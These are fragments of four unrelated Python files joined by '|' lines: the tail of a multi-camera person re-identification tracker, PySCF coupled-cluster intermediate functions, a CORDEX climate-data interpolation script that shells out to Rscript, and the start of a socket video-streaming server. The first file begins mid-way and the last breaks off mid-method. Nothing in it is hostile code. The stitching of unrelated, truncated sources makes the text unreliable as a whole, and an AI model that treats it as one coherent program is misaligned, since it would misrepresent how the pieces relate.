#flags.DEFINE_string('cam_db_path', '../reid/database', 'default cam database path')
#flags.DEFINE_string('merge_db_path', "../reid/database/merge", 'default merged reid database path, where all of the samples from cam are saved into the db with timestamp')
#flags.DEFINE_string('output', './outputs/', 'path to output video')
flags.DEFINE_boolean('output', False, 'path to output video')
flags.DEFINE_string('output_format', 'MJPG', 'codec used in VideoWriter when saving video to file')
flags.DEFINE_float('iou', 0.45, 'iou threshold')
flags.DEFINE_float('score', 0.50, 'score threshold')
flags.DEFINE_boolean('dont_show', False, 'dont show video output')
flags.DEFINE_boolean('info', False, 'show detailed info of tracked objects')
flags.DEFINE_boolean('count', False, 'count objects being trascked on screen')
#flags.DEFINE_boolean('db', True, 'save information in database')
flags.DEFINE_boolean('trajectory', False, 'draw historical trajectories on every tracked human')
flags.DEFINE_integer('input_skip_frame', 8, 'number of frame to be skipped')
flags.DEFINE_integer('db_skip_frame', 8, 'number of frame to be skipped')
flags.DEFINE_boolean('saliant_sampling', True, 'select and store unique frame only into database')
flags.DEFINE_boolean('plot_graph', False, 'plot graph for soft threshold')
flags.DEFINE_integer('parallel_ps', 8, 'number of human tracker process to run')
flags.DEFINE_boolean('online', True, 'run online image extraction using rtsp')
flags.DEFINE_boolean('reid', True, 'set to True to run with REID, set to False if new labelled data are needed to be recorded')
# def db_process(*args):
# def signal_handler(sig, frame):
# name = mp.current_process().name
# print(str(name) + ': You pressed Ctrl+C!')
# db_list = []
# # args[0] is the camera list
# # args[1] is the length of camera list
# # args[2] is the cam path
# # args[3] is the db merge path
# # args[4] is the shared queue recording the database paths
# for i in range(args[1]):
# if args[0]:
# db_list.append(args[2] + "/Cam_" + str(args[0][i]) + ".db")
# # finish gathering the db_paths, run merge.
# print('Saving merge database..')
# now = dt.datetime.now()
# db_name = now.strftime("Reid_Interrputed_%Y%m%d.db")
# db_filepath = os.path.join(args[3], db_name)
# reid_db = ImageDB(db_name=db_filepath)
# reid_db.delete_dbfile()
# reid_db.create_table()
# reid_db.merge_data(db_list)
# sys.exit(0)
# signal.signal(signal.SIGINT, signal_handler)
# while True:
# db_list = []
# # args[0] is the length of camera list
# # args[1] is the shared queue recording the database paths
# while len(db_list) < args[1]:
# print("db_path_process: ", args[4].get())
# db_list.append(args[4].get())
# #time.sleep(1)
# # finish gathering the db_paths, run merge.
# print('Saving merge database..')
# now = dt.datetime.now()
# db_name = now.strftime("Reid_%Y%m%d.db")
# db_filepath = os.path.join(args[3], db_name)
# reid_db = ImageDB(db_name=db_filepath)
# reid_db.delete_dbfile()
# reid_db.create_table()
# reid_db.merge_data(db_list)
class MultiPs():
def __init__(self):
self.job = []
self.thread = []
self.cam = []
# shared resource
#self.db_queue = mp.Queue()
self.manager = mp.Manager()
self.stop_tracker = self.manager.Value('i',0)
self.stop_main_ps = self.manager.Value('i',1)
self.db_path = None
self.unique_id = self.manager.list()
def log_msg(self):
mp.log_to_stderr()
logger = mp.get_logger()
logger.setLevel(logging.DEBUG)
def new_job(self, name, target, *args):
print("args: ", args)
args = (*args, self.stop_main_ps, self.stop_tracker)
print("new args: ", args)
j = mp.Process(name=name, target=target, args=args)
j.daemon = True
self.job.append(j)
def new_thread(self, name, target, *args):
t = Thread(name=name, target=target, args=args)
t.daemon = True
self.thread.append(t)
def create_new_db(self):
#global db_path
#global reid
now = dt.datetime.now()
db_name = now.strftime("Reid_%Y%m%d.db")
db_path = os.path.join(FLAGS.reid_db_path, db_name).replace("\\","/")
reid_db = ImageDB(db_name=db_path)
print("reid db_path: ", db_path)
reid_db.delete_dbfile()
reid_db.create_table()
self.db_path = db_path
#reid = Reid(db_path)
# main process will run this database
def save_db(self):
renew_db = True
while self.stop_main_ps.value:
now = dt.datetime.now()
t = now.timetuple()
# t[6] consists of day name information. 0 = Monday. 4 = Friday.
#print("t[6]: ", t[6])
if t[6] == 2 or t[6] == 5:
if renew_db:
# stop human tracker processes
self.stop_tracker.value = 1
# create new database on Wednesday and Saturday, and only renew one time on each day.
self.create_new_db()
renew_db = False
print("New Database with timestamp [", now.strftime("%A, %d. %B %Y %I:%M%p"), ']')
# reset human tracker processes
self.stop_tracker.value = 0
else:
time.sleep(1)
else:
renew_db = True
#print("self.stop_tracker: ", self.stop_tracker.value)
#print("main process ticks..")
time.sleep(1)
print("save_db loop is ended..")
def signal_handler(self, sig, frame):
print('Main Program: You pressed Ctrl+C!')
# when ctrl + c, rename the database as interrupted
if os.path.isfile(self.db_path):
now = dt.datetime.now()
db_name = now.strftime("Reid_Interrupted_%Y%m%dT%H%M%S.db")
interrupt_path = os.path.join(FLAGS.reid_db_path, "Interrupt", db_name).replace("\\","/")
#os.rename(self.db_path, interrupt_path)
shutil.move(self.db_path, interrupt_path)
for j in self.job:
j.join()
sys.exit(0)
def cam_stream(mps):
mps.job.clear()
mps.new_job('camera_ch' + FLAGS.video, camera_capture, int(FLAGS.video))
for j in mps.job:
j.start()
for j in mps.job:
j.join()
def sequential_run(batch, cam, db_path, mps):
mps.job.clear()
#mps.new_job('database_ps', db_process, cam, FLAGS.parallel_ps, FLAGS.reid_db_path, FLAGS.merge_db_path)
mps.cam = cam
print("batch:", batch)
gpu_num = 0
for ch in batch:
mps.new_job('camera_ch' + ch, camera_capture, FLAGS.online, int(ch), gpu_num, db_path)
#gpu_num = 1 - gpu_num
for j in mps.job:
j.start()
# main process in while loop, save database when cutoff date is reached
mps.save_db()
for j in mps.job:
j.join()
def online_run(rtsp, cam, gpu, loc, db_path, mps):
mps.job.clear()
#mps.new_job('database_ps', db_process, cam, FLAGS.parallel_ps, FLAGS.reid_db_path, FLAGS.merge_db_path)
mps.cam = cam
for i in range(FLAGS.parallel_ps):
# cam[i]:int , rtsp[i]:str
mps.new_job('camera_ch' + str(cam[i]), camera_capture, FLAGS.online, cam[i], rtsp[i], gpu[i], loc[i], db_path)
print("New online process for cam " + str(cam[i]))
for j in mps.job:
j.start()
# main process in while loop, save database when cutoff date is reached
mps.save_db()
for j in mps.job:
j.join()
def get_rtsp(file):
table = pd.read_excel(file, dtype={'Camera RTSP Stream': str, 'Channel': int}, engine='openpyxl')
return table
def create_ps_list(vfile):
ch_list = []
for f in vfile:
filename = os.path.splitext(f)[0]
if filename.split('ch')[0] == '' and filename.split('ch')[-1].isdigit() == True:
print(filename.split('ch')[-1])
ch_list.append(filename.split('ch')[-1])
if len(ch_list) == 0:
print("No video file with 'ch' name. Please rename your input video with 'ch[channel number].mp4'.")
return -1
ch_list.sort(key=int)
ps_list = None
last_ps_num = len(ch_list) % FLAGS.parallel_ps
if last_ps_num != 0:
last_ps = ch_list[-last_ps_num:]
print("last_ps:", last_ps)
first_ps = ch_list[:-last_ps_num]
print("first_ps:", first_ps)
ps_list = np.asarray(first_ps).reshape(-1, FLAGS.parallel_ps).tolist()
ps_list.append(last_ps)
print(ps_list)
else:
ps_list = np.asarray(ch_list).reshape(-1, FLAGS.parallel_ps).tolist()
print(ps_list)
return ps_list
def main_single(_argv):
# initialize database
img_db = ImageDB()
img_db.create_table()
camera_capture(2)
def main(_argv):
mps = MultiPs()
signal.signal(signal.SIGINT, mps.signal_handler)
# mps.log_msg()
print("Parent Process PID: " + str(os.getpid()))
print("Initialize database..")
# create new database with timestamp
mps.create_new_db()
# initialize backup database
#db_path = None
# if FLAGS.db:
# db_path = "./database/Image_" + str(dt.datetime.now().strftime("%Y%m%dT%H%M%S")) + ".db"
# print("db_path main: ", db_path)
# img_db = ImageDB(db_path)
#img_db.delete_dbfile()
#img_db.create_table()
# online mode
if FLAGS.online:
table = get_rtsp(FLAGS.rtsp_path)
online_run(table.to_dict('dict')['rtsp'], table.to_dict('dict')['cam'], table.to_dict('dict')['gpu'], table.to_dict('dict')['loc'], mps.db_path, mps)
# offline mode
else:
if not FLAGS.video.isdigit():
# get video file info from video folder
vfile = os.listdir(FLAGS.video)
if len(vfile) == 0:
print("No files in the " + FLAGS.video)
return -1
ps_list = create_ps_list(vfile)
print("Start Multiprocessing..")
table = get_rtsp(FLAGS.rtsp_path)
# run new camera process
for batch in ps_list:
sequential_run(batch, table.to_dict('dict')['cam'], mps.db_path, mps)
else:
cam_stream(mps)
# for j in mps.job:
# j.start()
# for j in mps.job:
# j.join()
print("End of program.")
if __name__ == '__main__':
try:
app.run(main)
except SystemExit:
pass
|
import tempfile
import numpy as np
import h5py
from pyscf import lib
#einsum = np.einsum
einsum = lib.einsum
# This is restricted (R)CCSD
# Ref: Hirata et al., J. Chem. Phys. 120, 2581 (2004)
### Eqs. (37)-(39) "kappa"
def cc_Foo(t1,t2,eris):
nocc, nvir = t1.shape
foo = eris.fock[:nocc,:nocc]
Fki = foo.copy()
Fki += 2*einsum('kcld,ilcd->ki',eris.ovov,t2)
Fki += -einsum('kdlc,ilcd->ki',eris.ovov,t2)
Fki += 2*einsum('kcld,ic,ld->ki',eris.ovov,t1,t1)
Fki += -einsum('kdlc,ic,ld->ki',eris.ovov,t1,t1)
return Fki
def cc_Fvv(t1,t2,eris):
nocc, nvir = t1.shape
fvv = eris.fock[nocc:,nocc:]
Fac = fvv.copy()
Fac += -2*einsum('kcld,klad->ac',eris.ovov,t2)
Fac += einsum('kdlc,klad->ac',eris.ovov,t2)
Fac += -2*einsum('kcld,ka,ld->ac',eris.ovov,t1,t1)
Fac += einsum('kdlc,ka,ld->ac',eris.ovov,t1,t1)
return Fac
def cc_Fov(t1,t2,eris):
nocc, nvir = t1.shape
fov = eris.fock[:nocc,nocc:]
Fkc = fov.copy()
Fkc += 2*einsum('kcld,ld->kc',eris.ovov,t1)
Fkc += -einsum('kdlc,ld->kc',eris.ovov,t1)
return Fkc
### Eqs. (40)-(41) "lambda"
def Loo(t1,t2,eris):
nocc, nvir = t1.shape
fov = eris.fock[:nocc,nocc:]
Lki = cc_Foo(t1,t2,eris) + einsum('kc,ic->ki',fov,t1)
Lki += 2*einsum('kilc,lc->ki',eris.ooov,t1)
Lki += -einsum('likc,lc->ki',eris.ooov,t1)
return Lki
def Lvv(t1,t2,eris):
nocc, nvir = t1.shape
fov = eris.fock[:nocc,nocc:]
Lac = cc_Fvv(t1,t2,eris) - einsum('kc,ka->ac',fov,t1)
eris_ovvv = lib.unpack_tril(np.asarray(eris.ovvv).reshape(nocc*nvir,-1)).reshape(nocc,nvir,nvir,nvir)
Lac += 2*einsum('kdac,kd->ac',eris_ovvv,t1)
Lac += -einsum('kcad,kd->ac',eris_ovvv,t1)
return Lac
### Eqs. (42)-(45) "chi"
def cc_Woooo(t1,t2,eris):
Wklij = np.array(eris.oooo).transpose(0,2,1,3).copy()
Wklij += einsum('kilc,jc->klij',eris.ooov,t1)
Wklij += einsum('ljkc,ic->klij',eris.ooov,t1)
Wklij += einsum('kcld,ijcd->klij',eris.ovov,t2)
Wklij += einsum('kcld,ic,jd->klij',eris.ovov,t1,t1)
return Wklij
def cc_Wvvvv(t1,t2,eris):
## Incore
#Wabcd = np.array(eris.vvvv).transpose(0,2,1,3)
#Wabcd += -einsum('kdac,kb->abcd',eris.ovvv,t1)
#Wabcd += -einsum('kcbd,ka->abcd',eris.ovvv,t1)
## HDF5
if t1.dtype == np.complex: ds_type = 'c16'
else: ds_type = 'f8'
_tmpfile1 = tempfile.NamedTemporaryFile(dir=lib.param.TMPDIR)
fimd = h5py.File(_tmpfile1.name)
nocc,nvir = t1.shape
Wabcd = fimd.create_dataset('vvvv', (nvir,nvir,nvir,nvir), ds_type)
# avoid transpose inside loop
eris_ovvv = lib.unpack_tril(np.asarray(eris.ovvv).reshape(nocc*nvir,-1)).reshape(nocc,nvir,nvir,nvir)
ovvv = np.array(eris_ovvv).transpose(0,2,1,3)
for a in range(nvir):
# Wabcd[a] = eris.vvvv[a].transpose(1,0,2)
# Wabcd[a] += -einsum('kdc,kb->bcd',eris_ovvv[:,:,a,:],t1)
# #Wabcd[a] += -einsum('kcbd,k->bcd',eris_ovvv,t1[:,a])
# Wabcd[a] += -einsum('k,kbcd->bcd',t1[:,a],ovvv)
w_vvv = einsum('kdc,kb->bcd',eris_ovvv[:,:,a,:],-t1)
w_vvv -= einsum('k,kbcd->bcd',t1[:,a],ovvv)
a0 = a*(a+1)//2
w_vvv[:,:a+1] += lib.unpack_tril(eris.vvvv[a0:a0+a+1]).transpose(1,0,2)
for i in range(a+1,nvir):
w_vvv[:,i] += lib.unpack_tril(eris.vvvv[i*(i+1)//2+a])
Wabcd[a] = w_vvv
return Wabcd
def cc_Wvoov(t1,t2,eris):
nocc, nvir = t1.shape
eris_ovvv = lib.unpack_tril(np.asarray(eris.ovvv).reshape(nocc*nvir,-1)).reshape(nocc,nvir,nvir,nvir)
Wakic = np.array(eris.ovvo).transpose(1,3,0,2)
Wakic -= einsum('likc,la->akic',eris.ooov,t1)
Wakic += einsum('kcad,id->akic',eris_ovvv,t1)
Wakic -= 0.5*einsum('ldkc,ilda->akic',eris.ovov,t2)
Wakic -= einsum('ldkc,id,la->akic',eris.ovov,t1,t1)
Wakic += einsum('ldkc,ilad->akic',eris.ovov,t2)
Wakic += -0.5*einsum('lckd,ilad->akic',eris.ovov,t2)
return Wakic
def cc_Wvovo(t1,t2,eris):
nocc, nvir = t1.shape
eris_ovvv = lib.unpack_tril(np.asarray(eris.ovvv).reshape(nocc*nvir,-1)).reshape(nocc,nvir,nvir,nvir)
Wakci = np.array(eris.oovv).transpose(2,0,3,1)
Wakci -= einsum('kilc,la->akci',eris.ooov,t1)
Wakci += einsum('kdac,id->akci',eris_ovvv,t1)
Wakci -= 0.5*einsum('lckd,ilda->akci',eris.ovov,t2)
Wakci -= einsum('lckd,id,la->akci',eris.ovov,t1,t1)
return Wakci
def Wooov(t1,t2,eris):
Wklid = np.asarray(eris.ooov).transpose(0,2,1,3) + einsum('ic,kcld->klid',t1,eris.ovov)
return Wklid
def Wvovv(t1,t2,eris):
nocc, nvir = t1.shape
eris_ovvv = lib.unpack_tril(np.asarray(eris.ovvv).reshape(nocc*nvir,-1)).reshape(nocc,nvir,nvir,nvir)
Walcd = np.asarray(eris_ovvv).transpose(2,0,3,1) - einsum('ka,kcld->alcd',t1,eris.ovov)
return Walcd
def W1ovvo(t1,t2,eris):
Wkaci = np.array(eris.ovvo).transpose(3,1,2,0)
Wkaci += 2*einsum('kcld,ilad->kaci',eris.ovov,t2)
Wkaci += -einsum('kcld,liad->kaci',eris.ovov,t2)
Wkaci += -einsum('kdlc,ilad->kaci',eris.ovov,t2)
return Wkaci
def W2ovvo(t1,t2,eris):
nocc, nvir = t1.shape
eris_ovvv = lib.unpack_tril(np.asarray(eris.ovvv).reshape(nocc*nvir,-1)).reshape(nocc,nvir,nvir,nvir)
Wkaci = einsum('la,lkic->kaci',-t1,Wooov(t1,t2,eris))
Wkaci += einsum('kcad,id->kaci',eris_ovvv,t1)
return Wkaci
def Wovvo(t1,t2,eris):
Wkaci = W1ovvo(t1,t2,eris) + W2ovvo(t1,t2,eris)
return Wkaci
def W1ovov(t1,t2,eris):
Wkbid = np.array(eris.oovv).transpose(0,2,1,3)
Wkbid += -einsum('kcld,ilcb->kbid',eris.ovov,t2)
return Wkbid
def W2ovov(t1,t2,eris):
nocc, nvir = t1.shape
eris_ovvv = lib.unpack_tril(np.asarray(eris.ovvv).reshape(nocc*nvir,-1)).reshape(nocc,nvir,nvir,nvir)
Wkbid = einsum('klid,lb->kbid',Wooov(t1,t2,eris),-t1)
Wkbid += einsum('kcbd,ic->kbid',eris_ovvv,t1)
return Wkbid
def Wovov(t1,t2,eris):
return W1ovov(t1,t2,eris) + W2ovov(t1,t2,eris)
def Woooo(t1,t2,eris):
Wklij = np.array(eris.oooo).transpose(0,2,1,3).copy()
Wklij += einsum('kcld,ijcd->klij',eris.ovov,t2)
Wklij += einsum('kcld,ic,jd->klij',eris.ovov,t1,t1)
Wklij += einsum('kild,jd->klij',eris.ooov,t1)
Wklij += einsum('ljkc,ic->klij',eris.ooov,t1)
return Wklij
def Wvvvv(t1,t2,eris):
## Incore
#Wabcd = np.array(eris.vvvv).transpose(0,2,1,3)
#Wabcd += einsum('kcld,klab->abcd',eris.ovov,t2)
#Wabcd += einsum('kcld,ka,lb->abcd',eris.ovov,t1,t1)
#Wabcd += -einsum('ldac,lb->abcd',eris.ovvv,t1)
#Wabcd += -einsum('kcbd,ka->abcd',eris.ovvv,t1)
## HDF5
if t1.dtype == np.complex: ds_type = 'c16'
else: ds_type = 'f8'
_tmpfile1 = tempfile.NamedTemporaryFile(dir=lib.param.TMPDIR)
fimd = h5py.File(_tmpfile1.name)
nocc,nvir = t1.shape
Wabcd = fimd.create_dataset('vvvv', (nvir,nvir,nvir,nvir), ds_type)
eris_ovvv = lib.unpack_tril(np.asarray(eris.ovvv).reshape(nocc*nvir,-1)).reshape(nocc,nvir,nvir,nvir)
for a in range(nvir):
#Wabcd[a] = eris.vvvv[a].transpose(1,0,2)
#Wabcd[a] += -einsum('ldc,lb->bcd',eris_ovvv[:,:,a,:],t1)
#Wabcd[a] += -einsum('kcbd,k->bcd',eris_ovvv,t1[:,a])
#Wabcd[a] += einsum('kcld,klb->bcd',eris.ovov,t2[:,:,a,:])
#Wabcd[a] += einsum('kcld,k,lb->bcd',eris.ovov,t1[:,a],t1)
w_vvv = einsum('ldc,lb->bcd',eris_ovvv[:,:,a,:],-t1)
w_vvv += einsum('kcbd,k->bcd',eris_ovvv,-t1[:,a])
w_vvv += einsum('kcld,klb->bcd',eris.ovov,t2[:,:,a,:])
w_vvv += einsum('kcld,k,lb->bcd',eris.ovov,t1[:,a],t1)
a0 = a*(a+1)//2
w_vvv[:,:a+1] += lib.unpack_tril(eris.vvvv[a0:a0+a+1]).transpose(1,0,2)
for i in range(a+1,nvir):
w_vvv[:,i] += lib.unpack_tril(eris.vvvv[i*(i+1)//2+a])
Wabcd[a] = w_vvv
return Wabcd
def Wvvvo(t1,t2,eris,_Wvvvv=None):
nocc, nvir = t1.shape
nocc,nvir = t1.shape
eris_ovvv = lib.unpack_tril(np.asarray(eris.ovvv).reshape(nocc*nvir,-1)).reshape(nocc,nvir,nvir,nvir)
Wabcj = np.array(eris_ovvv).transpose(3,1,2,0).conj()
# Check if t1=0 (HF+MBPT(2))
# einsum will check, but don't make vvvv if you can avoid it!
if np.any(t1):
if _Wvvvv is None:
_Wvvvv = Wvvvv(t1,t2,eris)
for a in range(nvir):
Wabcj[a] += einsum('bcd,jd->bcj',_Wvvvv[a],t1)
Wabcj += -einsum('alcj,lb->abcj',W1ovov(t1,t2,eris).transpose(1,0,3,2),t1)
Wabcj += -einsum('kbcj,ka->abcj',W1ovvo(t1,t2,eris),t1)
Wabcj += 2*einsum('ldac,ljdb->abcj',eris_ovvv,t2)
Wabcj += -einsum('ldac,ljbd->abcj',eris_ovvv,t2)
Wabcj += -einsum('lcad,ljdb->abcj',eris_ovvv,t2)
Wabcj += -einsum('kcbd,jkda->abcj',eris_ovvv,t2)
Wabcj += einsum('ljkc,lkba->abcj',eris.ooov,t2)
Wabcj += einsum('ljkc,lb,ka->abcj',eris.ooov,t1,t1)
Wabcj += -einsum('kc,kjab->abcj',cc_Fov(t1,t2,eris),t2)
return Wabcj
def Wovoo(t1,t2,eris):
nocc, nvir = t1.shape
eris_ovvv = lib.unpack_tril(np.asarray(eris.ovvv).reshape(nocc*nvir,-1)).reshape(nocc,nvir,nvir,nvir)
Wkbij = np.array(eris.ooov).transpose(1,3,0,2).conj()
Wkbij += einsum('kbid,jd->kbij',W1ovov(t1,t2,eris),t1)
Wkbij += -einsum('klij,lb->kbij',Woooo(t1,t2,eris),t1)
Wkbij += einsum('kbcj,ic->kbij',W1ovvo(t1,t2,eris),t1)
Wkbij += 2*einsum('kild,ljdb->kbij',eris.ooov,t2)
Wkbij += -einsum('kild,jldb->kbij',eris.ooov,t2)
Wkbij += -einsum('likd,ljdb->kbij',eris.ooov,t2)
Wkbij += einsum('kcbd,jidc->kbij',eris_ovvv,t2)
Wkbij += einsum('kcbd,jd,ic->kbij',eris_ovvv,t1,t1)
Wkbij += -einsum('ljkc,libc->kbij',eris.ooov,t2)
Wkbij += einsum('kc,ijcb->kbij',cc_Fov(t1,t2,eris),t2)
return Wkbij
|
'''usage: python cordexabel.py ncpath lname llon llat lalt prefix n onlygeog
with default values for prefix = . and n = 500.
'''
import sys
import os
import numpy as np
import netCDF4
import datetime
import time
sys.path.append('/cluster/home/kojito/lib/python/site-packages')
import geopy.distance
myfmt = '%.8f' ## 8 significant digits, e.g., 53.80798340
nstats = 42
with open('RCMModelName.txt') as f:
RCMlist = [l.rstrip().split()[:2] for l in f.readlines() if not l[0] == '#']
RCMdict = dict(RCMlist)
def parsefn(fn, prefix = '.'):
'''parses the cordex file name and returns
(the directory directory path, VariableName, StartTime, EndTime)
StartTime and EndTime are None if Frequency is not day'''
assert fn[-3:] == '.nc', 'the file name has to have .nc'
elements = fn.strip()[:-3].split('_')
VariableName = elements[0]
Domain = elements[1]
GCMModelName = elements[2]
CMIP5ExperimentName = elements[3]
CMIP5EnsembleMember = elements[4]
RCMModelName = elements[5]
try:
Institute = RCMdict[RCMModelName]
except KeyError:
sys.exit('RCM Model name not found')
RCMVersionID = elements[6]
Frequency = elements[7]
StartTime = None
EndTime = None
if Frequency == 'day':
StartTime, EndTime = elements[8].split('-')
dirpath = os.path.join(prefix, Domain, Institute, GCMModelName,
CMIP5ExperimentName, CMIP5EnsembleMember,
RCMModelName, RCMVersionID, Frequency, VariableName)
return (dirpath, VariableName, StartTime, EndTime)
def getorogfn(fn):
'''returns the corresponding orography .nc file name'''
assert fn[-3:] == '.nc', 'the file name has to have .nc'
elements = fn.strip()[:-3].split('_')
# VariableName = 'orog'
# Domain = elements[1]
# GCMModelName = elements[2]
# CMIP5ExperimentName = elements[3]
# CMIP5EnsembleMember = elements[4]
# RCMModelName = elements[5]
# RCMVersionID = elements[6]
# Frequency = 'fx'
orogfn = '_'.join(['orog'] + elements[1:7] + ['fx']) + '.nc'
return orogfn
def writegeog(orogfn, dirname, lname, llat, llon, n, dummy = False):
'''extracts geographical information (longitude, latitude, altitude)
from orography .nc file.
Writes 3 files in dirname. "near-LOCATION-altitude.txt.gz" etc.
It also returns tuple of 4 elements:
1) the boolean ndarray isnearby, the nearest n vertices being True
2) latpath
3) lonpath
4) altpath
'''
latfn = 'near-%s_latitude.txt.gz' % lname
latpath = os.path.join(dirname, latfn)
lonfn = 'near-%s_longitude.txt.gz' % lname
lonpath = os.path.join(dirname, lonfn)
altfn = 'near-%s_altitude.txt.gz' % lname
altpath = os.path.join(dirname, altfn)
# distfn = 'near_%s-distance.txt.gz' % lname
# distpath = os.path.join(dirname, distfn)
r = netCDF4.Dataset(orogfn)
lon = r.variables['lon'][:, :].flatten()
lat = r.variables['lat'][:, :].flatten()
dist = np.array([geopy.distance.great_circle((llat, llon), (la, lo)).km
for lo, la in zip(lon.tolist(), lat.tolist())])
## get the rank
temp = dist.argsort()
ranks = np.empty(len(dist), int)
ranks[temp] = np.arange(len(dist)) # smaller number closer to the loc
isnearby = ranks < n
if not os.path.exists(dirname): os.makedirs(dirname)
if not dummy:
orog = r.variables['orog'][:, :].flatten()
print('[cordexabel.writegeog()] writing to %s' % lonpath)
np.savetxt(lonpath, lon[isnearby], fmt = myfmt)
print('[cordexabel.writegeog()] writing to %s' % latpath)
np.savetxt(latpath, lat[isnearby], fmt = myfmt)
print('[cordexabel.writegeog()] writing to %s' % altpath)
np.savetxt(altpath, orog[isnearby], fmt = '%.2f')
# np.savetxt(distpath, dist[isnearby], fmt = myfmt)
r.close()
return (isnearby, latpath, lonpath, altpath)
def spinterp(ncpath, lname, llat, llon, lalt, prefix = '.', n = 500):
'''runs the spatial interpolation Rscript for all data along time unit
in ncfn, using the geography files (see writegeog()) in the directory
parsefn(getorogfn(ncfn), '.')[0],
with the prediction at a new location with longitude (llon),
latitude (llat) and altitude (lalt), and write outputs in
os.path.join(parsefn(ncfn, '.')[0], lname).
llat, llon, lalt: float
It will create necessary directories.'''
ncdir, ncfn = os.path.split(ncpath)
orogfn = getorogfn(ncfn)
orogpath = os.path.join(ncdir, orogfn)
outdir, VariableName, StartTime, EndTime = parsefn(ncfn, prefix)
if not os.path.exists(outdir): os.makedirs(outdir)
print('[cordexabel.py] orogpath is %s' % orogpath)
if not os.path.exists(orogpath):
print('[cordexabel.py] orogpath does not exist')
pref = '_'.join(orogfn.split('_')[:4])
suff = '_'.join(orogfn.split('_')[-3:])
filelist = os.listdir(ncdir)
alternatives = [f for f in filelist if pref in f and suff in f]
if len(alternatives) > 0:
print('[cordexabel.py] found %s instead' % alternatives[0])
orogfn = alternatives[0]
orogpath = os.path.join(ncdir, orogfn)
else:
sys.exit('[cordexabel.py] ERROR: could not find the orog file')
geogdir = parsefn(orogfn, prefix)[0]
isnearby, latpath, lonpath, altpath = \
writegeog(orogpath, geogdir, lname, llat, llon, n, dummy = True)
# make_geog_flag = True
# wait_flag = False
# flag1 = False
# flag2 = False
# flag3 = False
# if os.path.exists(latpath):
# wait_flag = True
# print('[cordexabel.py] latpath already exists')
# lat = np.loadtxt(latpath)
# condition1 = lat.shape[0] == n
# condition2 = np.isnan(lat).sum() == 0
# if condition1 and condition2:
# print('[cordexabel.py] latpath is already a complete file')
# flag1 = True
# if os.path.exists(lonpath):
# wait_flag = True
# print('[cordexabel.py] lonpath already exists')
# lon = np.loadtxt(latpath)
# condition1 = lon.shape[0] == n
# condition2 = np.isnan(lon).sum() == 0
# if condition1 and condition2:
# print('[cordexabel.py] lonpath is already a complete file')
# flag2 = True
# if os.path.exists(altpath):
# wait_flag = True
# print('[cordexabel.py] altpath already exists')
# alt = np.genfromtxt(altpath)
# condition1 = alt.shape[0] == n
# condition2 = np.isnan(alt).sum() == 0
# if condition1 and condition2:
# print('[cordexabel.py] altpath is already a complete file')
# flag3 = True
# if flag1 and flag2 and flag3:
# make_geo_flag = False
# print('[cordexabel.py] all geog files already exists and therefore will not be made this time')
# if make_geog_flag and wait_flag:
# time.sleep(20)
# if make_geog_flag:
# print('[cordexabel.py] writing geography files...')
# isnearby, latpath, lonpath, altpath = \
# writegeog(orogpath, geogdir, lname, llat, llon, n, dummy = False)
# writes 3 .txt.gz files
txtgzpath = os.path.join(outdir, 'near-%s_%s.txt.gz' % (
lname, os.path.splitext(ncfn)[0]))
r = netCDF4.Dataset(ncpath)
v = r.variables[VariableName]
t, y, x = v.shape
print('[cordexabel.py] writing variable file from the .nc file...')
np.savetxt(txtgzpath, v[:, :, :].reshape((t, y * x))[:, isnearby], fmt = myfmt)
r.close()
resultspath = os.path.join(outdir, 'interpolated', lname,
'interpolated-%s_%s.txt.gz' % (
lname, os.path.splitext(ncfn)[0]))
resultsdir = os.path.dirname(resultspath)
do_interp_flag = True
if not os.path.exists(resultsdir): os.makedirs(resultsdir)
# if os.path.exists(resultspath):
# print('[cordexabel.py] resultspath already exists')
# print('[cordexabel.py] checking whether it appears to be complete...')
# startdate_s, enddate_s = \
# os.path.basename(resultspath).split('.txt.gz')[0].split('_')[-1].split('-')
# n_days = 1 + \
# (datetime.date(int(enddate_s[:4]),
# int(enddate_s[4:6]),
# int(enddate_s[6:])) -
# datetime.date(int(startdate_s[:4]),
# int(startdate_s[4:6]),
# int(startdate_s[6:]))).days
# print('[cordexabel.py] %s to %s, %s days' % (
# startdate_s, enddate_s, n_days))
# results = np.loadtxt(resultspath)
# nrow, ncol = results.shape
# if (nrow == n_days and ncol == nstats):
# print('[cordexabel.py] the already existing results looks complete, finishing')
# do_interp_flag = False
# else:
# print('[cordexabel.py] the already existing results is imcomplete')
# return None
if do_interp_flag:
print('[cordexabel.py] interpolating -- calling R...')
## usage: Rscript spinterp_cordex.R --args \
## lonpath latpath orogpath varpath llon llat lalt resultspath
command = '%s \\\n%s \\\n%s \\\n%s \\\n%s \\\n%s %s %s \\\n%s' % (
'Rscript spinterp_cordex.R --args',
lonpath, latpath, altpath, txtgzpath, llon, llat, lalt, resultspath)
print(command)
os.system(command)
os.unlink(txtgzpath)
if __name__ == '__main__':
a = sys.argv
ncpath = a[1]
lname = a[2]
llon = a[3]
llat = a[4]
lalt = a[5]
prefix = '.' if len(a) <= 6 else a[6]
n = 500 if len(a) <= 7 else int(a[7])
onlygeog = False if len(a) <= 8 else bool(a[8])
if onlygeog:
print('[cordexabel.py] creating geog files only')
ncdir, ncfn = os.path.split(ncpath)
orogfn = getorogfn(ncfn)
orogpath = os.path.join(ncdir, orogfn)
geogdir = parsefn(orogfn, prefix)[0]
outdir, VariableName, StartTime, EndTime = parsefn(ncfn, prefix)
if not os.path.exists(outdir): os.makedirs(outdir)
print('[cordexabel.py] orogpath is %s' % orogpath)
if not os.path.exists(orogpath):
print('[cordexabel.py] orogpath does not exist')
pref = '_'.join(orogfn.split('_')[:4])
suff = '_'.join(orogfn.split('_')[-3:])
filelist = os.listdir(ncdir)
alternatives = [f for f in filelist if pref in f and suff in f]
if len(alternatives) > 0:
print('[cordexabel.py] found %s instead' % alternatives[0])
orogfn = alternatives[0]
orogpath = os.path.join(ncdir, orogfn)
else:
sys.exit('[cordexabel.py] ERROR: could not find the orog file')
isnearby, latpath, lonpath, altpath = \
writegeog(orogpath, geogdir, lname, llat, llon, n, dummy = False)
else:
spinterp(ncpath, lname, llat, llon, lalt, prefix, n)
|
import numpy as np
import cv2
import socket
class videoStreaming(object):
def __init__(self, host, port):
self.serverSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # server socket
self.serverSocket.bind((host, port)) # binds the host ip with port
self.serverSocket.listen(0)
self.connection, self.clientAddress = self.serverSocket.accept()
self.connectionBuff = self.connection.makefile('rb')
self.hostName = socket.gethostname()
self.hostIp = socket.gethostbyname(self.hostName)
self.stream()
def stream(self):
try:
print(f'Host: {self.hostName}, {self.hostIp}')
print(f'Connection from: {self.clientAddress}')
